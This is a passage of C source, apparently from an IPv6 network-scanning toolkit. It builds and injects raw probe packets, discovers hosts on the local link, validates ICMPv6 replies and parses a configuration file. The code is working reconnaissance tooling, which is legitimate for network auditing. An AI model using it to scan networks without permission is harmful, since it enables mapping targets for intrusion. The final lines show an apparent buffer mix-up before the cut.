sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } while(rhbytes>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhbytes--; } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); break; case IPPROTO_UDP: *prev_nh = IPPROTO_UDP; if( (ptr+sizeof(struct udp_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 header (should be using Frag. option?)"); exit(EXIT_FAILURE); } udp= (struct udp_hdr *) ptr; memset(udp, 0, sizeof(struct udp_hdr)); ptr+= sizeof(struct udp_hdr); /* For UDP, we encode the current probe number and the current Hop Limit as fr TCP. Namely, we encode the probe number and the current Hop Limit in the TCP Source Port. The probe number is encoded in the upper eight bits, while the current Hop Limit is encoded in the lower eight bits. A constant "offset" is employed for encoding the probe number, such that the resulting Source Port falls into what is typically known as the dynamic ports range (say, ports larger than 50000). */ if(srcport_f) udp->uh_sport= htons(srcport); else udp->uh_sport= htons(1024+ rand() % 64512); udp->uh_dport= htons((port_list->port[port_list->cport])->cur); /* XXX Send some minimum packet size -- should be changed */ rhbytes= 40; if(rhbytes){ rhleft=rhbytes; if( (ptr + rhleft) > (v6buffer+ idata->max_packet_size)){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhleft>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhleft -= sizeof(uint32_t); } while(rhleft>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhleft--; } } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); udp->uh_ulen= htons(ptr - (unsigned char *) udp); udp->uh_sum=0; udp->uh_sum = in_chksum(v6buffer, udp, ptr-((unsigned char *)udp), IPPROTO_UDP); break; } if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f) printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(0); } if(nw != (ptr-buffer)){ if(idata->verbose_f) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); return(0); } return(1); } /* * Function: multi_scan_local() * * Performs an IPv6 address scan on a local link */ int multi_scan_local(pcap_t *pfd, struct iface_data *idata, struct in6_addr *srcaddr, unsigned char type, \ const char *ptargetaddr, struct host_list *hlist){ struct bpf_program pcap_filter; struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; unsigned char *pkt_end; unsigned char *ptr; unsigned char buffer[65556]; unsigned int icmp6_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; volatile unsigned int tries=0; struct in6_addr targetaddr; struct sigaction new_sig, old_sig; struct ip6_dest *destopth; struct ip6_option *opt; uint32_t *uint32; unsigned char error_f=FALSE, llocalsrc_f=FALSE; int result; icmp6_max_packet_size = idata->mtu; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; if ( inet_pton(AF_INET6, ptargetaddr, &targetaddr) <= 0){ if(idata->verbose_f>1) puts("inet_pton(): Source Address not valid"); return(-1); } if(IN6_IS_ADDR_LINKLOCAL(srcaddr)) llocalsrc_f=TRUE; if(pfd == NULL) return(-1); switch(type){ case PROBE_ICMP6_ECHO: if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_ERNS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } break; case PROBE_UNREC_OPT: if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_ERRORNS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } break; default: return(-1); break; } if(pcap_setfilter(pfd, &pcap_filter) == -1){ if(idata->verbose_f) printf("pcap_setfilter(): %s", pcap_geterr(pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= *srcaddr; ipv6->ip6_dst= targetaddr; ether->src = idata->ether; ether->dst = ether_multicast(&(ipv6->ip6_dst)); ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; switch(type){ case PROBE_ICMP6_ECHO: *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct icmp6_hdr)+ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+icmp6_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while creating ICMPv6 Echo Request Probe packet"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = random(); icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); } break; case PROBE_UNREC_OPT: *prev_nh = IPPROTO_DSTOPTS; if( (ptr+sizeof(struct icmp6_hdr) + 8 + ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+icmp6_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while creating Unrec. Opt. Probe Packet"); return(-1); } destopth = (struct ip6_dest *) ptr; destopth->ip6d_len= 0; destopth->ip6d_nxt= IPPROTO_ICMPV6; ptr= ptr + 2; opt= (struct ip6_option *) ptr; opt->ip6o_type= 0x80; opt->ip6o_len= 4; ptr= ptr + 2; uint32 = (uint32_t *) ptr; *uint32 = random(); ptr= ptr +4; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = random(); icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); } break; } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; memset(&new_sig, 0, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &local_sig_alarm; if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries <= idata->local_retrans && !error_f){ if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(pfd)); error_f=TRUE; break; } if(nw != (ptr-buffer)){ if(idata->verbose_f>1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); error_f=TRUE; break; } alarm(idata->local_timeout); while( (hlist->nhosts < hlist->maxhosts) && !error_f){ do{ if((result=pcap_next_ex(pfd, &pkthdr, &pktdata)) == -1){ if(idata->verbose_f>1) printf("pcap_next_ex(): %s", pcap_geterr(pfd)); error_f=TRUE; break; } }while(result == 0 || pktdata == NULL); if(error_f) break; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (ETHER_HDR_LEN + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if(pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; if(is_eq_in6_addr(&(pkt_ns->nd_ns_target), srcaddr) || \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata->ip6_local))){ if(send_neighbor_advert(idata, pfd, pktdata) == -1){ error_f=TRUE; break; } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_PARAM_PROB)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; /* If the Source Address was a link-local address, we only want link-local addresses. OTOH, if the Source Address was a global address, we only want global addresses. */ if(llocalsrc_f){ if(!IN6_IS_ADDR_LINKLOCAL(&(pkt_ipv6->ip6_src))) continue; } else{ if(IN6_IS_ADDR_LINKLOCAL(&(pkt_ipv6->ip6_src))) continue; } if(valid_icmp6_response(idata, type, pkthdr, pktdata, buffer)){ if(is_ip6_in_list(&(pkt_ipv6->ip6_src), hlist)) continue; if( (hlist->host[hlist->nhosts]= malloc(sizeof(struct host_entry))) == NULL){ if(idata->verbose_f>1) puts("Error when allocating memory for host data"); error_f=TRUE; break; } memset(hlist->host[hlist->nhosts], 0, sizeof(struct host_entry)); (hlist->host[hlist->nhosts])->ip6= pkt_ipv6->ip6_src; (hlist->host[hlist->nhosts])->ether= pkt_ether->src; (hlist->host[hlist->nhosts])->flag = VALID_MAPPING; (hlist->nhosts)++; } } } } /* Processing packets */ } /* Resending Neighbor Solicitations */ if( sigaction(SIGALRM, &old_sig, NULL) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); error_f=TRUE; } if(error_f) return(-1); else return 0; } /* * Function: find_local_globals() * * Finds Global Unicast Addresses present on the local link */ int find_local_globals(pcap_t *pfd, struct iface_data *idata, unsigned char type, const char *ptargetaddr, \ struct host_list *hlist){ unsigned int i; for(i=0; i < idata->ip6_global.nprefix; i++){ if(multi_scan_local(pfd, idata, &((idata->ip6_global.prefix[i])->ip6), type, ALL_NODES_MULTICAST_ADDR,\ hlist) == -1){ return(-1); } } return 0; } /* * Function: host_scan_local() * * Scans a single IPv6 address */ int host_scan_local(pcap_t *pfd, struct iface_data *idata, struct in6_addr *srcaddr, unsigned char type, struct host_entry *host){ struct bpf_program pcap_filter; struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; unsigned char *pkt_end; volatile unsigned char *ptr; unsigned char buffer[65556]; unsigned int icmp6_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; volatile unsigned int tries=0; struct in6_addr targetaddr; struct sigaction new_sig, old_sig; struct ip6_dest *destopth; struct ip6_option *opt; uint32_t *uint32; unsigned char foundaddr_f=FALSE, error_f=FALSE; int result; icmp6_max_packet_size = idata->mtu; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; targetaddr= host->ip6; if( pcap_datalink(pfd) != DLT_EN10MB){ if(idata->verbose_f>1) printf("Error: Interface %s is not an Ethernet interface", idata->iface); return(-1); } switch(type){ case PROBE_ICMP6_ECHO: if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_ERNS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } break; case PROBE_UNREC_OPT: if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_ERRORNS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } break; default: return(-1); break; } if(pcap_setfilter(pfd, &pcap_filter) == -1){ if(idata->verbose_f>1) printf("pcap_setfilter(): %s", pcap_geterr(pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_dst= targetaddr; ipv6->ip6_src= *srcaddr; ether->src = idata->ether; ether->dst = host->ether; ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; switch(type){ case PROBE_ICMP6_ECHO: *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct icmp6_hdr)+ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+icmp6_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while creating ICMPv6 Echo Request Probe packet"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = random(); icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); } break; case PROBE_UNREC_OPT: *prev_nh = IPPROTO_DSTOPTS; if( (ptr+sizeof(struct icmp6_hdr) + 8 + ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+icmp6_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while creating Unrec. Opt. Probe Packet"); return(-1); } destopth = (struct ip6_dest *) ptr; destopth->ip6d_len= 0; destopth->ip6d_nxt= IPPROTO_ICMPV6; ptr= ptr + 2; opt= (struct ip6_option *) ptr; opt->ip6o_type= 0x80; opt->ip6o_len= 4; ptr= ptr + 2; uint32 = (uint32_t *) ptr; *uint32 = random(); ptr= ptr +4; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = random(); icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); } break; } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; memset(&new_sig, 0, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &local_sig_alarm; if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries<= idata->local_retrans && !foundaddr_f && !error_f){ if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(pfd)); error_f=TRUE; break; } if(nw != (ptr-buffer)){ if(idata->verbose_f>1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); error_f=TRUE; break; } alarm(idata->local_timeout); foundaddr_f=FALSE; while(!foundaddr_f && !error_f){ do{ if( (result=pcap_next_ex(pfd, &pkthdr, &pktdata)) == -1){ if(idata->verbose_f>1) printf("pcap_next_ex(): %s", pcap_geterr(pfd)); error_f=TRUE; break; } }while(result == 0 || pktdata == NULL); if(error_f) break; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (ETHER_HDR_LEN + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); if(pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; if(is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata->ip6_local)) || \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), srcaddr)){ if(send_neighbor_advert(idata, pfd, pktdata) == -1){ error_f=TRUE; break; } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_PARAM_PROB)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; if(valid_icmp6_response(idata, type, pkthdr, pktdata, buffer)){ host->ether= pkt_ether->src; host->flag = VALID_MAPPING; foundaddr_f=TRUE; break; } } } } /* Processing packets */ } /* Resending Probe packet */ if( sigaction(SIGALRM, &old_sig, NULL) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); error_f=TRUE; } if(error_f) return(-1); else return 0; } /* * Function: print_host_entries() * * Prints the IPv6 addresses (and optionally the Ethernet addresses) in a list */ int print_host_entries(struct host_list *hlist, unsigned char flag){ unsigned int i; for(i=0; i < (hlist->nhosts); i++){ if(inet_ntop(AF_INET6, &((hlist->host[i])->ip6), pv6addr, sizeof(pv6addr)) == NULL){ if(verbose_f>1) puts("inet_ntop(): Error converting IPv6 address to presentation format"); return(-1); } if(flag == PRINT_ETHER_ADDR){ if(ether_ntop( &((hlist->host[i])->ether), plinkaddr, sizeof(plinkaddr)) == 0){ if(verbose_f>1) puts("ether_ntop(): Error converting address"); return(-1); } printf("%s @ %s\n", pv6addr, plinkaddr); } else printf("%s\n", pv6addr); } return 0; } /* * Function: print_unique_host_entries() * * Prints only one IPv6 address (and optionally the Ethernet addresses) per Ethernet * address in a list. */ int print_unique_host_entries(struct host_list *hlist, unsigned char flag){ unsigned int i, j, k; for(i=0; i < (hlist->nhosts); i++){ if(i){ for(j=0; j < i; j++){ for(k=0; k < ETH_ALEN; k++){ if((hlist->host[i])->ether.a[k] != (hlist->host[j])->ether.a[k]) break; } if(k == ETH_ALEN) break; } if(j < i) continue; } if(inet_ntop(AF_INET6, &((hlist->host[i])->ip6), pv6addr, sizeof(pv6addr)) == NULL){ if(verbose_f>1) puts("inet_ntop(): Error converting IPv6 address to presentation format"); return(-1); } if(flag == PRINT_ETHER_ADDR){ if(ether_ntop( &((hlist->host[i])->ether), plinkaddr, sizeof(plinkaddr)) == 0){ if(verbose_f>1) puts("ether_ntop(): Error converting address"); return(-1); } printf("%s @ %s\n", pv6addr, plinkaddr); } else printf("%s\n", pv6addr); } return 0; } /* * Function: free_host_entries() * * Releases memory allocated for holding IPv6 addresses and Ethernet addresses */ void free_host_entries(struct host_list *hlist){ unsigned int i; for(i=0; i< hlist->nhosts; i++) free(hlist->host[i]); hlist->nhosts=0; /* Set the number of entries to 0, to reflect the released memory */ return; } /* * Function: create_candidate_globals() * * Generates list of cadidate global addresses based on the local Global prefixes and Interface IDs */ int create_candidate_globals(struct iface_data *idata, struct host_list *local, struct host_list *global, \ struct host_list *candidate){ unsigned int i, j, k; struct in6_addr caddr; for(i=0; (i < local->nhosts) && (candidate->nhosts < candidate->maxhosts); i++){ /* Avoid global Address present in "local" list -- shouldn't happen, though */ if(IN6_IS_ADDR_LINKLOCAL(&((local->host[i])->ip6)) ){ /* We create one candidate address with the Interface-ID of the link-local address, for each of the autoconf prefixes */ for(j=0; (j < idata->prefix_ac.nprefix) && (candidate->nhosts < candidate->maxhosts); j++){ for(k=0; k<2; k++) caddr.s6_addr32[k] = (idata->prefix_ac.prefix[j])->ip6.s6_addr32[k]; for(k=2; k<4; k++) caddr.s6_addr32[k] = local->host[i]->ip6.s6_addr32[k]; /* We discard the candidate address if it is already present in the "global" list */ if(is_ip6_in_list(&caddr, global)) continue; if( (candidate->host[candidate->nhosts]=malloc(sizeof(struct host_entry))) == NULL){ if(verbose_f>1) puts("Error allocating memory while creating local -> global list"); return(-1); } memset(candidate->host[candidate->nhosts], 0, sizeof(struct host_entry)); (candidate->host[candidate->nhosts])->ip6 = caddr; (candidate->host[candidate->nhosts])->ether = (local->host[i])->ether; (candidate->nhosts)++; } } } return 0; } /* * Function: validate_host_entries() * * Tests entries in a list, updates entries with invalid mappings, and removes non-existent addresses */ int validate_host_entries(pcap_t *pfd, struct iface_data *idata, struct host_list *candidate, struct host_list *global){ unsigned int i; struct in6_addr *srcaddrptr; for(i=0; i< candidate->nhosts; i++){ if((candidate->host[i])->flag == INVALID_MAPPING){ srcaddrptr = sel_src_addr_ra(idata, &((candidate->host[i])->ip6)); if(probe_unrec_f){ if(host_scan_local(pfd, idata, srcaddrptr, PROBE_UNREC_OPT, candidate->host[i]) == -1) return(-1); } if( ((candidate->host[i])->flag == INVALID_MAPPING) && probe_echo_f){ if(host_scan_local(pfd, idata, srcaddrptr, PROBE_ICMP6_ECHO, candidate->host[i]) == -1) return(-1); } } if((candidate->host[i])->flag == VALID_MAPPING){ global->host[global->nhosts] = candidate->host[i]; (global->nhosts)++; } else{ free(candidate->host[i]); } } return 0; } /* * Function: valid_icmp6_response() * * Checks whether the response to an ICMPv6 probe is valid */ int valid_icmp6_response(struct iface_data *idata, unsigned char type, struct pcap_pkthdr *pkthdr,\ const u_char *pktdata, unsigned char *pktsent){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6, *ipv6; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6, *icmp6; unsigned char *pkt_end; ipv6 = (struct ip6_hdr *) (pktsent + sizeof(struct ether_header)); if(type == PROBE_UNREC_OPT) icmp6 = (struct icmp6_hdr *) ( (char *) ipv6 + sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE); else icmp6 = (struct icmp6_hdr *) ( (char *) ipv6 + sizeof(struct ip6_hdr)); pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; switch(type){ case PROBE_ICMP6_ECHO: pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ ICMPV6_ECHO_PAYLOAD_SIZE) ) return 0; break; case PROBE_UNREC_OPT: pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the embedded payload */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ + sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE + sizeof(struct icmp6_hdr) + \ ICMPV6_ECHO_PAYLOAD_SIZE) ) return 0; break; } /* Check that that the Destination Address of the incoming packet is the same as the one we used for the Source Address of the Probe packet. */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src))) return 0; /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0) return 0; switch(type){ case PROBE_ICMP6_ECHO: if(pkt_icmp6->icmp6_data16[0] != icmp6->icmp6_data16[0]){ return 0; } else if(pkt_icmp6->icmp6_data16[1] != icmp6->icmp6_data16[1]){ return 0; } break; case PROBE_UNREC_OPT: pkt_icmp6_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr) +\ sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE); if(pkt_icmp6_icmp6->icmp6_data16[0] != icmp6->icmp6_data16[0]){ return 0; } else if(pkt_icmp6_icmp6->icmp6_data16[1] != icmp6->icmp6_data16[1]){ return 0; } break; } return 1; } /* * Function: valid_icmp6_response_remote() * * Checks whether the response to an ICMPv6 probe is valid */ int valid_icmp6_response_remote(struct iface_data *idata, struct scan_list *scan, unsigned char type, struct pcap_pkthdr *pkthdr,\ const u_char *pktdata, unsigned char *pktsent){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6, *ipv6; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6, *icmp6; unsigned char *pkt_end; ipv6 = (struct ip6_hdr *) (pktsent + idata->linkhsize); if(type == PROBE_UNREC_OPT) icmp6 = (struct icmp6_hdr *) ( (char *) ipv6 + sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE); else icmp6 = (struct icmp6_hdr *) ( (char *) ipv6 + sizeof(struct ip6_hdr)); pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; switch(type){ case PROBE_ICMP6_ECHO: /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ ICMPV6_ECHO_PAYLOAD_SIZE) ) return 0; break; case PROBE_UNREC_OPT: /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the empedded payload */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ + sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE + sizeof(struct icmp6_hdr) + \ ICMPV6_ECHO_PAYLOAD_SIZE) ) return 0; break; } /* Check that that the Destination Address of the incoming packet is the same as the one we used for the Source Address of the Probe packet. */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src))) return 0; /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0) return 0; switch(type){ case PROBE_ICMP6_ECHO: if(pkt_icmp6->icmp6_data16[0] != icmp6->icmp6_data16[0]){ return 0; } else if(pkt_icmp6->icmp6_data16[1] != icmp6->icmp6_data16[1]){ return 0; } break; case PROBE_UNREC_OPT: pkt_icmp6_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr) +\ sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE); if(pkt_icmp6_icmp6->icmp6_data16[0] != icmp6->icmp6_data16[0]){ return 0; } else if(pkt_icmp6_icmp6->icmp6_data16[1] != icmp6->icmp6_data16[1]){ return 0; } break; } return 1; } /* * Function: process_config_file() * * Processes the SI6 Networks' toolkit configuration file */ int process_config_file(const char *path){ FILE *fp; char *key, *value; char line[MAX_LINE_SIZE]; int r; unsigned int ln=1; if( (fp=fopen(path, "r")) == NULL){ return(0); } while(fgets(line, sizeof(line), fp) != NULL){ r=keyval(line, Strnlen(line, MAX_LINE_SIZE), &key, &value); if(r == 1){ if(strncmp(key, "OUI-Database", MAX_VAR_NAME_LEN) == 0){ strncpy(fname, value, MAX_FILENAME_SIZE-1); fname[MAX_FILENAME_SIZE-1]=0; fname_f=TRUE; } else if(strncmp(key, "Ports-Database", MAX_VAR_NAME_LEN) == 0){ strncpy(portsfname, value, MAX_FILENAME_SIZE-1); portsfname[MAX_FILENAME_SIZE-1]=0; portsfname_f=TRUE; } } else if(r == -1){ if(verbose_f){ printf("Error in configuration file %s", configfile); } fclose(fp); return(0); } ln++; } fclose(fp); if(!fname_f) strncpy(fname, "/usr/local/share/ipv6toolkit/oui.txt", MAX_FILENAME_SIZE-1); if(!portsfname_f) strncpy(fname, 